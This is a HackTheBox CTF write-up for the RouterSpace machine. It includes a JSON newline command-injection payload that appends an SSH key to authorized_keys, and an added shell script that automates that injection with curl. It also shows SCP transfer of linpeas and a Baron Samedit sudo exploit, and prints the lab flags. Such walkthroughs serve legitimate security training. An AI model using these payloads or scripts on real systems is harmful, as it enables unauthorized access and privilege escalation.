RouterSpace

Vishal Rashmika published on
3 min, 546 words

Categories: HackTheBox

Scanning

First, let's start with an Nmap scan.

nmap -sV -sC 10.10.11.148

From the Nmap scan we can see that two ports are open: a web server and SSH.


Web Enumeration

Let’s visit the website first,


It's just a static website; only the download button works. Download routerspace.apk and install it in Anbox (Android Studio's emulator or Genymotion work the same way).


Run the application and click Check Status: it says the router is working fine.

Exploitation

Let's intercept this in Burp. For that I first need to point the emulator at a proxy (10.10.14.28 is my tun0 address, 8001 the port Burp will listen on):

adb shell settings put global http_proxy 10.10.14.28:8001

Now configure a Burp proxy listener bound to the tun0 IP on that port.

With everything set, click Check Status and the request is captured.

Send it to the Repeater tab. The request goes to routerspace.htb, so add that hostname to /etc/hosts, then send the request.

Let's try command injection with id. But the response just reflects the same string back.

Now let's try some basic filter bypasses. Simply adding \n in front of the command works: the JSON escape becomes a real newline, which acts as a command separator that the filter does not catch, and the output of id comes back in the response.

I tried different methods to get a reverse shell but none of them worked because of iptables rules. Let's check whether there is an id_rsa key in paul's .ssh directory.

Nothing there, so I decided to add my own public key to paul's .ssh directory. But first, let's generate a key pair.

Now let's add it to paul's .ssh directory.

I use the double greater-than sign (>>) because I don't want to overwrite anyone's existing SSH key; it simply appends to the file.

{"ip":"\necho 'your id_rsa.pub contents' >> /home/paul/.ssh/authorized_keys"}

Check whether the file exists, and it does.
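The same injection, driven from the shell instead of Burp Repeater, as an added example (this is not code from the original writeup). It assumes only what the page shows: the JSON field is "ip" and the command must be prefixed with a literal backslash-n so the server's JSON decoder turns it into a newline. The endpoint path was not printed above, so TARGET_URL is a placeholder that must be replaced with the URL captured in Burp.

```shell
#!/bin/sh
# Added example, not code from the original writeup: drive the newline
# command injection from the shell.
# ASSUMPTIONS: the JSON field is "ip" (as in the writeup's payload); the
# endpoint path is a placeholder taken from the intercepted Burp request.
TARGET_URL="${TARGET_URL:-http://routerspace.htb/REPLACE-WITH-CAPTURED-PATH}"

# json_escape STR: escape backslashes and double quotes so STR can sit
# inside a JSON string literal.
json_escape() {
    printf '%s' "$1" | sed -e 's/\\/\\\\/g' -e 's/"/\\"/g'
}

# build_payload CMD: JSON body with the two characters backslash-n before
# CMD. The server decodes \n to a real newline, so CMD ends up on its own
# line after whatever the application prepends to the "ip" value.
build_payload() {
    printf '{"ip":"\\n%s"}' "$(json_escape "$1")"
}

# key_drop_payload PUBKEY: the writeup's authorized_keys append wrapped as an
# injection payload. >> appends rather than overwriting existing keys.
key_drop_payload() {
    build_payload "echo '$1' >> /home/paul/.ssh/authorized_keys"
}

# classify SENT EXPECTED RESPONSE: "executed" if RESPONSE contains output only
# execution would produce (EXPECTED), "reflected" if it merely echoes the
# value we sent (SENT), otherwise "unknown".
classify() {
    case "$3" in
        *"$2"*) echo executed; return 0 ;;
    esac
    case "$3" in
        *"$1"*) echo reflected; return 0 ;;
    esac
    echo unknown
}

# send_payload BODY: POST the JSON body to the target. Only called by probe,
# so sourcing this file does no network I/O.
send_payload() {
    curl -s -X POST -H 'Content-Type: application/json' \
        --data "$1" "$TARGET_URL"
}

# probe CMD EXPECTED: send CMD and report executed/reflected/unknown.
# For "id", EXPECTED is "uid=" (present in real output, absent from the payload).
probe() {
    body="$(build_payload "$1")"
    resp="$(send_payload "$body")"
    classify "\\n$1" "$2" "$resp"
}
```

Usage: `probe id uid=` should print "executed"; without the newline prefix the same request comes back "reflected", which is exactly what the Repeater experiment showed. After `send_payload "$(key_drop_payload "$(cat ~/.ssh/id_rsa.pub)")"`, confirm the drop with `probe 'cat /home/paul/.ssh/authorized_keys' "$(cut -d' ' -f2 ~/.ssh/id_rsa.pub)"`. If you prefer not to edit /etc/hosts, curl's `--resolve routerspace.htb:80:10.10.11.148` maps the hostname for a single request (port 80 is an assumption; use whatever port Nmap reported).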

Now let's get an SSH connection.

ssh -i /home/larnzlort/.ssh/id_rsa paul@10.10.11.148

Now let’s grab the user flag.

cat user.txt

2394adcb72320ac4a8e18a4cd7fdaa98 --- User Flag

Privesc

Because of the iptables rules we can't simply curl the linpeas file onto the box, but we can use scp to copy it over SSH.

scp -i /home/larnzlort/.ssh/id_rsa /opt/PEASS-ng/linPEAS/linpeas.sh paul@10.10.11.148:/dev/shm

Now that we have linpeas, let's run it.

./linpeas.sh | tee linpeas_out

And we see that sudo is vulnerable to CVE-2021-3156 (Baron Samedit, a heap overflow in sudo's handling of shell-mode arguments).
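Before transferring an exploit it is worth confirming the finding independently of linpeas. The following is an added example, not part of the original writeup, that implements the test Qualys published for this bug: run `sudoedit -s /` as an unprivileged user, and a vulnerable sudo answers with an error beginning "sudoedit:" while a patched one prints "usage:". It also checks the reported version against the ranges named in the advisory (1.8.2 through 1.8.31p2 and 1.9.0 through 1.9.5p1). The sample strings in the test are constructed; nothing here is taken from the target.

```shell
#!/bin/sh
# Added example, not from the original writeup: a quick check for
# CVE-2021-3156 (Baron Samedit) that does not rely on linpeas.

# classify_sudoedit_output TEXT: map the stderr of "sudoedit -s /" to a
# verdict. Qualys' test: vulnerable builds fail with "sudoedit: ...",
# patched builds reject the flag combination with "usage: ...".
classify_sudoedit_output() {
    case "$1" in
        sudoedit:*) echo vulnerable ;;
        usage:*)    echo patched ;;
        *)          echo unknown ;;
    esac
}

# version_tuple VER: split "1.8.31p2" into "1 8 31 2"; missing parts are 0.
version_tuple() {
    old_ifs=$IFS
    IFS='.p'
    set -- $1
    IFS=$old_ifs
    echo "${1:-0} ${2:-0} ${3:-0} ${4:-0}"
}

# version_vulnerable VER: "yes" if VER is inside the advisory's ranges
# (1.8.2 .. 1.8.31p2 or 1.9.0 .. 1.9.5p1), else "no".
version_vulnerable() {
    set -- $(version_tuple "$1")
    maj=$1 min=$2 pat=$3 p=$4
    if [ "$maj" -eq 1 ] && [ "$min" -eq 8 ]; then
        if [ "$pat" -ge 2 ] && [ "$pat" -lt 31 ]; then echo yes; return 0; fi
        if [ "$pat" -eq 31 ] && [ "$p" -le 2 ]; then echo yes; return 0; fi
    elif [ "$maj" -eq 1 ] && [ "$min" -eq 9 ]; then
        if [ "$pat" -lt 5 ]; then echo yes; return 0; fi
        if [ "$pat" -eq 5 ] && [ "$p" -le 1 ]; then echo yes; return 0; fi
    fi
    echo no
}

# check_sudo_samedit: run both checks on this host. Not invoked when the
# file is sourced; call it explicitly as the low-privilege user.
check_sudo_samedit() {
    if ! command -v sudoedit >/dev/null 2>&1; then
        echo "unknown (sudoedit not found)"
        return 0
    fi
    ver="$(sudo --version 2>/dev/null | sed -n '1s/^Sudo version //p')"
    echo "sudo version ${ver:-?}, in known-vulnerable range: $(version_vulnerable "$ver")"
    # </dev/null so a patched sudo can never sit waiting on a password prompt
    classify_sudoedit_output "$(sudoedit -s / 2>&1 </dev/null)"
}
```

Usage: copy the file over with scp exactly as linpeas was, then `. ./samedit-check.sh && check_sudo_samedit` as paul. The sudoedit probe is the more trustworthy of the two signals, since distributions backport fixes without bumping the upstream version string.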

Let's transfer the exploit over SSH as well.

scp -i /home/larnzlort/.ssh/id_rsa ./CVE-2021-3156.py paul@10.10.11.148:/dev/shm

Now let's run the exploit.

python3 CVE-2021-3156.py

And we get a root shell and root.txt.

635f3fe93741b2e566ef5cef97d3c18e --- Root Flag

And we successfully pwned it.